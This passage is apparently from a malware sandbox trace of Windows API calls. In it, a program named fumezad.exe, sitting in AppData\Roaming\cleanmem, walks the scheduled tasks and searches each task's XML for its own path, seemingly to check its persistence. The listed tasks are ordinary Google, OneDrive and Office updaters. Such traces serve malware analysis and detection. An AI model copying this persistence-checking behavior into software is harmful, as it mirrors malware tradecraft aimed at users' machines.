lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.679] IUnknown:Release (This=0x126b10) returned 0x0 [0137.679] IRegisteredTaskCollection:get_Item (in: This=0x126a50, index=0x24df60*(varType=0x3, wReserved1=0xffff, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000003, varVal2=0xfffffffffffffffe), ppRegisteredTask=0x24df10 | out: ppRegisteredTask=0x24df10*=0x126b10) returned 0x0 [0137.679] IRegisteredTask:get_Name (in: This=0x126b10, pName=0x24df30 | out: pName=0x24df30*="GoogleUpdateTaskMachineUA") returned 0x0 [0137.679] IRegisteredTask:get_Xml (in: This=0x126b10, pXml=0x24df18 | out: pXml=0x24df18*="\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x31\x36\x22\x3f\x3e\x0d\x0a\x3c\x54\x61\x73\x6b\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x32\x22\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x63\x6f\x6d\x2f\x77\x69\x6e\x64\x6f\x77\x73\x2f\x32\x30\x30\x34\x2f\x30\x32\x2f\x6d\x69\x74\x2f\x74\x61\x73\x6b\x22\x3e\x0d\x0a\x20\x20\x3c\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x56\x65\x72\x73\x69\x6f\x6e\x3e\x31\x2e\x33\x2e\x33\x33\x2e\x35\x3c\x2f\x56\x65\x72\x73\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x48\xe4\x6c\x74\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x61\x75\x66\x20\x64\x65\x6d\x20\x6e\x65\x75\x65\x73\x74\x65\x6e\x20\x53\x74\x61\x6e\x64\x2e\x20\x46\x61\x6c\x6c\x73\x20\x64\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x61\x6b\x74\x69\x76\x69\x65\x72\x74\x20\x6f\x64\x65\x72\x20\x61\x6e\x67\x65\x68\x61\x6c\x74\x65\x6e\x20\x77\x69\x72\x64\x2c\x20\x77\x69\x72\x64\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x6b\x74\x75\x61\x6c\x69\x73\x69\x65\x72\x74\x2e\x20\x44\x61\x73\x20\x68\x65\x69\xdf\x74\x2c\x20\x64\x61\x73\x73\x20\x65\x76\x65\x6e\x74\x75\x65\x6c\x6c\x20\x61\x75\x66\x74\x72\x65\x74\x65\x6e\x64\x65\x20\x53\x69\x63\x68\x65\x72\x68\x65\x69\x74\x73\x6c\xfc\x63\x6b\x65\x6e\x20\x6e\x69\x63\x68\x74\x20\x62\x65\x68\x6f\x62\x65\x6e\x20\x75\x6e\x64\x20\x62\x65\x73\x74\x69\x6d\x6d\x74\x65\x20\x46\x75\x6e\x6b\x74\x69\x6f\x6e\x65\x6e\x20\x6d\xf6\x67\x6c\x69\x63\x68\x65\x72\x77\x65\x69\x73\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x75\x73\x67\x65\x66\xfc\x68\x72\x74\x20\x77\x65\x72\x64\x65\x6e\x20\x6b\xf6\x6e\x6e\x65\x6e\x2e\x20\x44\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x69\x6e\x73\x74\x61\x6c\x6c\x69\x65\x72\x74\x20\x73\x69\x63\x68\x20\x73\x65\x6c\x62\x73\x74\x2c\x20\x77\x65\x6e\x6e\x20\x73\x69\x65\x20\x6e\x69\x63\x68\x74\x20\x76\x6f\x6e\x20\x65\x69\x6e\x65\x72\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x76\x65\x72\x77\x65\x6e\x64\x65\x74\x20\x77\x69\x72\x64\x2e\x3c\x2f\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x3c\x2f\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x3c\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x32\x30\x31\x37\x2d\x30\x36\x2d\x33\x30\x54\x31\x30\x3a\x33\x36\x3a\x30\x39\x3c\x2f\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x50\x54\x31\x48\x3c\x2f\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x75\x72\x61\x74\x69\x6f\x6e\x3e\x50\x31\x44\x3c\x2f\x44\x75\x72\x61\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x31\x3c\x2f\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x3c\x2f\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x20\x69\x64\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x55\x73\x65\x72\x49\x64\x3e\x53\x2d\x31\x2d\x35\x2d\x31\x38\x3c\x2f\x55\x73\x65\x72\x49\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x48\x69\x67\x68\x65\x73\x74\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3c\x2f\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x3e\x0d\x0a\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x3c\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x49\x67\x6e\x6f\x72\x65\x4e\x65\x77\x3c\x2f\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x74\x72\x75\x65\x3c\x2f\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x50\x54\x37\x32\x48\x3c\x2f\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x0d\x0a\x20\x20\x3c\x2f\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x3c\x41\x63\x74\x69\x6f\x6e\x73\x20\x43\x6f\x6e\x74\x65\x78\x74\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x43\x3a\x5c\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x20\x28\x78\x38\x36\x29\x5c\x47\x6f\x6f\x67\x6c\x65\x5c\x55\x70\x64\x61\x74\x65\x5c\x47\x6f\x6f\x67\x6c\x65\x55\x70\x64\x61\x74\x65\x2e\x65\x78\x65\x3c\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x2f\x75\x61\x20\x2f\x69\x6e\x73\x74\x61\x6c\x6c\x73\x6f\x75\x72\x63\x65\x20\x73\x63\x68\x65\x64\x75\x6c\x65\x72\x3c\x2f\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x61\x73\x6b\x3e") returned 0x0 [0137.682] StrStrIW (lpFirst="\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x31\x36\x22\x3f\x3e\x0d\x0a\x3c\x54\x61\x73\x6b\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x32\x22\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x63\x6f\x6d\x2f\x77\x69\x6e\x64\x6f\x77\x73\x2f\x32\x30\x30\x34\x2f\x30\x32\x2f\x6d\x69\x74\x2f\x74\x61\x73\x6b\x22\x3e\x0d\x0a\x20\x20\x3c\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x56\x65\x72\x73\x69\x6f\x6e\x3e\x31\x2e\x33\x2e\x33\x33\x2e\x35\x3c\x2f\x56\x65\x72\x73\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x48\xe4\x6c\x74\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x61\x75\x66\x20\x64\x65\x6d\x20\x6e\x65\x75\x65\x73\x74\x65\x6e\x20\x53\x74\x61\x6e\x64\x2e\x20\x46\x61\x6c\x6c\x73\x20\x64\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x61\x6b\x74\x69\x76\x69\x65\x72\x74\x20\x6f\x64\x65\x72\x20\x61\x6e\x67\x65\x68\x61\x6c\x74\x65\x6e\x20\x77\x69\x72\x64\x2c\x20\x77\x69\x72\x64\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x6b\x74\x75\x61\x6c\x69\x73\x69\x65\x72\x74\x2e\x20\x44\x61\x73\x20\x68\x65\x69\xdf\x74\x2c\x20\x64\x61\x73\x73\x20\x65\x76\x65\x6e\x74\x75\x65\x6c\x6c\x20\x61\x75\x66\x74\x72\x65\x74\x65\x6e\x64\x65\x20\x53\x69\x63\x68\x65\x72\x68\x65\x69\x74\x73\x6c\xfc\x63\x6b\x65\x6e\x20\x6e\x69\x63\x68\x74\x20\x62\x65\x68\x6f\x62\x65\x6e\x20\x75\x6e\x64\x20\x62\x65\x73\x74\x69\x6d\x6d\x74\x65\x20\x46\x75\x6e\x6b\x74\x69\x6f\x6e\x65\x6e\x20\x6d\xf6\x67\x6c\x69\x63\x68\x65\x72\x77\x65\x69\x73\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x75\x73\x67\x65\x66\xfc\x68\x72\x74\x20\x77\x65\x72\x64\x65\x6e\x20\x6b\xf6\x6e\x6e\x65\x6e\x2e\x20\x44\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x69\x6e\x73\x74\x61\x6c\x6c\x69\x65\x72\x74\x20\x73\x69\x63\x68\x20\x73\x65\x6c\x62\x73\x74\x2c\x20\x77\x65\x6e\x6e\x20\x73\x69\x65\x20\x6e\x69\x63\x68\x74\x20\x76\x6f\x6e\x20\x65\x69\x6e\x65\x72\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x76\x65\x72\x77\x65\x6e\x64\x65\x74\x20\x77\x69\x72\x64\x2e\x3c\x2f\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x3c\x2f\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x3c\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x32\x30\x31\x37\x2d\x30\x36\x2d\x33\x30\x54\x31\x30\x3a\x33\x36\x3a\x30\x39\x3c\x2f\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x50\x54\x31\x48\x3c\x2f\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x75\x72\x61\x74\x69\x6f\x6e\x3e\x50\x31\x44\x3c\x2f\x44\x75\x72\x61\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x31\x3c\x2f\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x3c\x2f\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x20\x69\x64\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x55\x73\x65\x72\x49\x64\x3e\x53\x2d\x31\x2d\x35\x2d\x31\x38\x3c\x2f\x55\x73\x65\x72\x49\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x48\x69\x67\x68\x65\x73\x74\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3c\x2f\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x3e\x0d\x0a\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x3c\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x49\x67\x6e\x6f\x72\x65\x4e\x65\x77\x3c\x2f\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x74\x72\x75\x65\x3c\x2f\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x50\x54\x37\x32\x48\x3c\x2f\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x0d\x0a\x20\x20\x3c\x2f\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x3c\x41\x63\x74\x69\x6f\x6e\x73\x20\x43\x6f\x6e\x74\x65\x78\x74\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x43\x3a\x5c\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x20\x28\x78\x38\x36\x29\x5c\x47\x6f\x6f\x67\x6c\x65\x5c\x55\x70\x64\x61\x74\x65\x5c\x47\x6f\x6f\x67\x6c\x65\x55\x70\x64\x61\x74\x65\x2e\x65\x78\x65\x3c\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x2f\x75\x61\x20\x2f\x69\x6e\x73\x74\x61\x6c\x6c\x73\x6f\x75\x72\x63\x65\x20\x73\x63\x68\x65\x64\x75\x6c\x65\x72\x3c\x2f\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x61\x73\x6b\x3e", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.682] IUnknown:Release (This=0x126b10) returned 0x0 [0137.683] IRegisteredTaskCollection:get_Item (in: This=0x126a50, index=0x24df60*(varType=0x3, wReserved1=0xffff, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000004, varVal2=0xfffffffffffffffe), ppRegisteredTask=0x24df10 | out: ppRegisteredTask=0x24df10*=0x126b10) returned 0x0 [0137.683] IRegisteredTask:get_Name (in: This=0x126b10, pName=0x24df30 | out: pName=0x24df30*="OneDrive Standalone Update Task-S-1-5-21-2345716840-1148442690-1481144037-1000") returned 0x0 [0137.683] IRegisteredTask:get_Xml (in: This=0x126b10, pXml=0x24df18 | out: pXml=0x24df18*="\r\n\r\n \r\n Microsoft Corporation\r\n \r\n \r\n \r\n 1992-05-01T04:00:00\r\n true\r\n \r\n P1D\r\n false\r\n \r\n P1D\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n true\r\n true\r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n false\r\n P1D\r\n 7\r\n \r\n \r\n \r\n %localappdata%\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe\r\n \r\n \r\n \r\n \r\n \r\n YKYD69Q\\aETAdzjz\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n") returned 0x0 [0137.707] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft Corporation\r\n \r\n \r\n \r\n 1992-05-01T04:00:00\r\n true\r\n \r\n P1D\r\n false\r\n \r\n P1D\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n true\r\n true\r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n false\r\n P1D\r\n 7\r\n \r\n \r\n \r\n %localappdata%\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe\r\n \r\n \r\n \r\n \r\n \r\n YKYD69Q\\aETAdzjz\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.707] IUnknown:Release (This=0x126b10) returned 0x0 [0137.707] IUnknown:Release (This=0x126a50) returned 0x0 [0137.707] ITaskFolder:GetFolders (in: This=0x125a50, flags=0, ppFolders=0x24df28 | out: ppFolders=0x24df28*=0x126a50) returned 0x0 [0137.711] ITaskFolderCollection:get_Count (in: This=0x126a50, pCount=0x24e098 | out: pCount=0x24e098*=3) returned 0x0 [0137.711] ITaskFolderCollection:get_Item (in: This=0x126a50, index=0x24df60*(varType=0x3, wReserved1=0xffff, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000001, varVal2=0xfffffffffffffffe), ppFolder=0x24df10 | out: ppFolder=0x24df10*=0x126b20) returned 0x0 [0137.711] ITaskFolder:GetTasks (in: This=0x126b20, flags=1, ppTasks=0x24dd90 | out: ppTasks=0x24dd90*=0x126b90) returned 0x0 [0137.717] IRegisteredTaskCollection:get_Count (in: This=0x126b90, pCount=0x24def0 | out: pCount=0x24def0*=0) returned 0x0 [0137.717] IUnknown:Release (This=0x126b90) returned 0x0 [0137.717] ITaskFolder:GetFolders (in: This=0x126b20, flags=0, ppFolders=0x24dd98 | out: ppFolders=0x24dd98*=0x126b90) returned 0x0 [0137.726] ITaskFolderCollection:get_Count (in: This=0x126b90, pCount=0x24df08 | out: pCount=0x24df08*=3) returned 0x0 [0137.726] ITaskFolderCollection:get_Item (in: This=0x126b90, index=0x24ddd0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppFolder=0x24dd80 | out: ppFolder=0x24dd80*=0x126cd0) returned 0x0 [0137.726] ITaskFolder:GetTasks (in: This=0x126cd0, flags=1, ppTasks=0x24dc00 | out: ppTasks=0x24dc00*=0x126d50) returned 0x0 [0137.737] IRegisteredTaskCollection:get_Count (in: This=0x126d50, pCount=0x24dd60 | out: pCount=0x24dd60*=6) returned 0x0 [0137.737] IRegisteredTaskCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24dbf0 | out: ppRegisteredTask=0x24dbf0*=0x126e90) returned 0x0 [0137.738] IRegisteredTask:get_Name (in: This=0x126e90, pName=0x24dc10 | out: pName=0x24dc10*="Office Automatic Updates") returned 0x0 [0137.738] IRegisteredTask:get_Xml (in: This=0x126e90, pXml=0x24dbf8 | out: pXml=0x24dbf8*="\r\n\r\n \r\n 2013-07-10T17:35:18.0059379\r\n Microsoft Office\r\n This task ensures that your Microsoft Office installation can check for updates.\r\n \r\n \r\n \r\n 2010-12-16T03:00:00\r\n true\r\n PT4H\r\n \r\n \r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n PT30M\r\n PT1H\r\n false\r\n \r\n P3D\r\n true\r\n PT15M\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n P3D\r\n 7\r\n \r\n PT30M\r\n 3\r\n \r\n \r\n \r\n \r\n C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\r\n /update SCHEDULEDTASK displaylevel=False\r\n \r\n \r\n") returned 0x0 [0137.750] StrStrIW (lpFirst="\r\n\r\n \r\n 2013-07-10T17:35:18.0059379\r\n 